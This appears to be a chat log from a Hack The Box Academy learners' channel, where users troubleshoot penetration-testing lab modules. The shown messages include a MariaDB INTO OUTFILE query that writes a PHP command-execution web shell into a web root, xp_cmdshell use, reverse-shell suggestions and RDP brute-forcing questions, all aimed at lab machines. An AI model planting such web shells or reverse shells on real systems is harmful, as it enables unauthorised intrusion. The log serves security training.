Sorry about the stupid question as well

bro you don't need to be sorry

I often have issues with terminology, since there is oftern multiple definitions

I was reading the section on forwarding and pivoting, which led me to this question: How can I set up a secure and effective reverse shell from my internal machine in a home network with NAT, considering port forwarding? I would like to ask here for advice in this scenario. What are the best practices? I came across this question while studying the topic. Thank you

i need help with making alt google

is their tools for that

i need to remine anonymous

I believe there is a typo in this section, where it says
Any option with Required set to yes needs to be set for the exploit to work. In this case, we only have two options to set: RHOSTS, which means the IP of our target (this can be one IP, multiple IPs, or a file containing a list of IPs). We can set them with the set command:
Is this indeed a typo, or is LHOST not meant to be mentioned? For the future, where do I report typos and such?

LHOST isn't mentioned but can be inferred from the following example

RHOSTS is the definitive one for what's described there

hello! I was doing the skill assessment of the module cmd vs powershell...User4 has a lot of files and folders in their Documents folder. The flag can be found within one of them. i tried with a script to find the file with more than 0 bits but i have no file greater than 0!

Has anyone finished the Windows Privilege Escalation Module? Im havin difficulties with the SeImpersonation Chapter. Imo its clear what i have to do to solve the task, but i dont get the respond i want. Either im wrong or there is something broken anyone can help me please? when i try to connect to the SQL server instance and run mssqlclient.py im trying to enable the cmdshell and run whoami which already gives no respond

@woeful sparrow I didn't do this module yet, did you successfully log in, do you have the peoper privileges to enable xp_cmdshell?

well when i try to enable xp_cmdshell i get a respond that it changed from 1 to 1 for xp_cmdshell

1 means enabled

@woeful sparrow ok, so it's enabled

It's a boolean value

i guess yes, but further shell command wont give a an output. I can use commands for the mssqlclient.py which all give me some kind of respond, but nothing for the xp_cmdshell in combination

@woeful sparrow what command do you type?

i will try it with the attack box now maybe it works then, ive used it on my kali machine.. I simply typed xp_cmdshell whoami to check if i get a respond

further i would check whoami /priv

Hey anyone here know how to use properly JohnTheReapper to get a password from an old mac ? i have the hash , DM if you can help

No

This channel isn't for that and going off of hedging bets, you don't have the permission to reset the macbook

Any pawnshop or resale shop should wipe or have had it wiped prior to selling it to you

@woeful sparrow you could try to use the full path ou you could try to use xp_cmdshell with the exec keyword before

the exec works, thank you othman my hero

@storm hedge you the best man, i was getting frustated

i have a question about MSF. how can i improve at knowing which exploits to apply to a machine? for example, im running through a module and the question at the bottom hints at there being an old version of sudo running on the target. If it weren't for that hint how would I have to known to look for that? and to build on that how would i have known the exploit to use is "sudo_baron_samedit"?

@woeful sparrow you're welcome man. We're all learning here

@dire abyss after gaining access to a host, enumeration is key, so with experience you get to know what to look for.

@dire abyss also you can use enumeration tools like linux peas

You can also use a vulnerability scan like Nessus and do an authenticated vulnerability scan with ssh for Linux

Afterwards, you can search for exploits with searchsploit and exploit-db

thats puts together somethings i saw on the reading material about nessus

also i rans vulns script with nmap and saw urls to exploit-db

thanks!

are we allowed to download the vpn connection file even though the target hasnt spawned?

@dire abyss no problem.
Metasploit has also some post exploitation scripts and modules you might find some enumeration tools there too, etc ..

basically you just need to enumerate with open eyes ,check the verson of softwares running , check the kernel version , check the services running ...

anyone else having problems spawning target machines? keep getting stuck on "Target is spawning"

Almost just attempted a priv esc when I already had the flag lol. I wonder how hard the passwords to the other accounts you might find but don't need to use are to crack.

bro GTFO from here

Yes

yup

damn...at least i am not only one

I want to complain more about it but that doesn't help

lol

hope they are awar and they will fix it soon

weird the labs are very stable for me

Oookay, sorry if you didn't like it.

this is channel dedicated to modules

they most likely are, this only started happening more around this month i've noticed.

Sorry, I am new to this channel and I didn't know, no need to be rude.

Protip: read a server's #welcome and #rules when you join

I'm just gonna read the stuff within the other parts in the module at least getting ahead is something still i like seeing that little green bar grow you know lol

Right, yes.

is everything here ethical?

Sorry for disturbing, I will find the right place.

not quite sure what you mean, this is a white-hat server though so nothing illegal/against TOS. think #rules covers most of it

Don't spam

yeah pretty much

it's even stressed in the modules

there is, i think you just have to verify first

#welcome

There is a gen chat, read #welcome

Nibbles is a #starting-point machine friend

Its used in academy

There's also nibbles in the getting-started module

Ya goober

Ah

It's used as an example

I forgor

I just woke up

And is walked through from start to finish

Typical blue teamer

Wakes up and chooses violence because he can't read

SMH my head

It's this section specifically

Your question is fine here

I get this output but the shell exits immediately

Its safe to post my tunnel ip right?

It could be an issue with backend stuff today

I can show my actual output

I cant really get more verbose with the output. I'm not sure where I'd begin to diagnose

try with different port it might help

trying to logon to splunk through the interactive window but it just keeps loading... can anyone help?

I rebooted my vm, redeployed the box on HTB, tried a different port, but I still get the same issue of the shell immediately exiting. Strange stuff

Try different Rev shell from https://www.revshells.com/ if it didn't work it maybe problem with their infra

I ended up using the pentest monkey one on gh and it worked. Thanks for the suggestion on trying a different reverse shell!

i am trying to run a directory enumeration on gobuster and i keep getting the message "Error: error on running gobuster, unable to connect to http://83.136.251.235.48523/ context deadline exceed (client timeout exceeded while awaiting headers)" Can someone please help me out?

you've got a dot instead of a colon in front of the port

Use :48523

it is a colon instead of a dot my bad. i was typing it out wrong

in the gobuster vm i mean. i still get the error

can you copy and paste the command and its error?

i tried to do that orginally but htb's bots wouldnt let me

ah right, you'll need to verify

have a look at #welcome

can i send it to you by dm for now?

yeah go ahead

😮

reset nd try again

Linux fundamentals path on Service and Process management module had me scratching my head

Why can’t I post a screenshot/image here?

cause you're not verified

#welcome You can see how to verify

typically webroot starts from htdocs, so path would be /cmd.php, but I haven't done that module very recently

would expect an error though, which is odd

No luck, still a blank screen

it's giving you a blank page because you didn't give it a command to execute

pass the command as the cmd parameter

My bad forgot to include that i did ||?cmd=whoami|| at the end and still a blank page

Nothing with this ||https://10.129.147.102/cmd.php?cmd=whoami|| or with the full path

does it support https? also try writing something static instead of getting a command

When I don't do https I get
Not Found

The requested URL was not found on this server.
Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29 Server at 10.129.147.102 Port 80

What would something static be?

what the fuck is wrong with this lab

yeah ok, ive had a look. firstly those backslashes are getting treated as escapes, either do forward slashes or double backslashes

i literally googled to see what someone else did and they did the EXACT same as i did and got a different result on the broken auth > brute forcing usernames

Facts man, not a fan of this section 😭

i ran the wfuzz command with the correct wordlist and all of the usernames return the same length file

second, xreous is right, the upload path of C:/xampp/htdocs/ is for http

Mainframe hacked.

my only conclusion is that this lab is broken

Ok i did forward slashes still nothing. and hmmm does that mean I uploaded it wrong?

When I try repeating the same command in ||SQL|| I get:

||MariaDB [(none)]> SELECT "<?php system($_GET['cmd']); ?>" into outfile "C:\xampp\htdocs\cmd.php";
ERROR 1086 (HY000): File 'C:xampphtdocscmd.php' already exists||

And then I went to ||https://10.129.147.102/xampphtdocscmd.php?cmd=whoami|| and without the https and no luck. Blank screen for https and not found for no https

nvm i found it + this lab sucks

yeah, so currently you've made a file called xampphtdocscmd.php at C:/

try to find the right path , read the web pages carefully

what i think (?) you're trying to do is make a file called cmd.php at C:/xampp/htdocs

you need the webserver to run your file , a good way is to figured out the path of dashboard.php then upload file to the same path

Hmmm ok, i also just went to Https://10.129.147.102 and I can upload files from there bruh 🫠 how did i not notice

Nvm it doesn't let me do anything except download the file I uploaded damn

that uploads to the ftp server which will not get you further access

guys, how do you brute force rdp ? i am having trouble with hydra and crowbar. only crackmapexec works kind of but slow

Yeah true, ugh makes no sense

follow the advice given above, use single forward slashes and http

Tried that, still says file not found

you are using the wrong path

did you read this ?

the website doesn't load files from this path

how do i find the path of dashboard.php?

Very confused rn

read the webpage very carefully

huh? the path is correct

are you sure ?

yeah, they just mucked up their backslashes

a la

it just escaped the normal characters and dumped it in the root drive

||C:/xampp/htdocs/dashboard/shell.php||

So I did this:

||MariaDB [(none)]> SELECT "<?php system($_GET['cmd']); ?>" into outfile "C:/xampp/htdocs/cmd.php";
Query OK, 1 row affected (0.071 sec)

MariaDB [(none)]> SELECT "<?php system($_GET['cmd']); ?>" into outfile "C:/xampp/htdocs/cmd.php";
ERROR 1086 (HY000): File 'C:/xampp/htdocs/cmd.php' already exists
MariaDB [(none)]> ||

and still not found

right, so you've made your file correctly, where are you looking for it

@inland mesa try this

thats another path, they're almost there though. they've made the file they just need to open it

Tried that, still same result

ive got rce on their victim machine, i can see them going through it dw:)

On the internet:|| http://10.129.147.102/xampp/htdocs/cmd.php|| am I incorrect?

thats the path from C:/, but when connecting from the web the root starts at htdocs, so try just /cmd.php

no just /cmd.php

Oh shittttttt it worked

Finally 😭

or /dashboard/cmd.php if you choose the other path lol

nice job

just use select load_file

forgor 💀

Appreciate the help @agile torrent @limber river you both are the GOATS. Sorry just had another question, is there anyway to open this in my terminal or do i have to interact via the url?

nah but you need to know where the flag is, and getting a shell is good practice

yeah just run rev shell on it , i guess

it's always better to get rce

Ah ok, I dont remember how but I feel I should figure it out lol

Might check out some Ippsec sure he has examples

have a look at https://www.revshells.com/, find a windows shell and catch it on your machine. powershell ones are prob the easiest

or ippsec, hes good

Sounds good thank you

eh

aw man, thats my day ruined

curse you

for the footprinting module for SMB, I am unsure what this question is asking "Find additional information about the specific share we found previously and submit the customized version of that specific share as the answer.
"

I dont need a hint but can someone rephrase it as I am confused

I done all questions preceeding it

*ive

I appreciate any help!

something like the version of the specific share

it will be obvious if u run one of the tools mentioned in the section

ohhh okay

thank you!!!! @limber river

Np

please anyone give me a nudge in osint module

brute force a different protocol.

Check out that dns!

Or perhaps reverse domain search

Can you explain this magic tip?

checked all the dns records of inlanefreight

but couldnt find that bucket name

gonna notify support on active directory enums and attacks module hopefully within the morning, it's unfair how all day I haven't been able to spawn target machines, I wonder what's going on, I know they said they were working on it last week, but maybe they don't know it's not working right.

Check out the website and the source code

Man, I remember when you had to look at the source code to sign up for htb.

https://www.w3resource.com/mysql/string-functions/mysql-load_file-function.php

Windows PrivEsc boxes not spawning: (Event Log Readers, DnsAdmins, etc..). Waited 7 hours now... Bueller? Bueller?

Regarding "ADCS Attacks" Module, I am getting error while running certipy

[-] Got error: Missing required parameter 'digestmod'.

Most likely it's Python issue, Has anyone faced this issue ?

And Why there is not windows machine given as an attack box, What if we want to attack from window box no linux ?

@burnt phoenix ?

Take a good look at the website. I mean, really look at everything @torpid ermine

Anyone having issues with the AD Skills Assessments not spawning?

lol

how to get back my electrum wallet?

Hi it's normal that the modules part in HTB Academy can't be to access and that is replaed by a javascript: void(0);

i installed it on my computer because i was trying to use electrum wallet.

now what everyone thinks im crazy

the guy's who just hacked on my computer just fix the computer and my dad paid the fix

wow amazing also got my electrum wallet

nice

not the place to ask, read #rules and #welcome

tldr: we really dont care, so stop being offtopic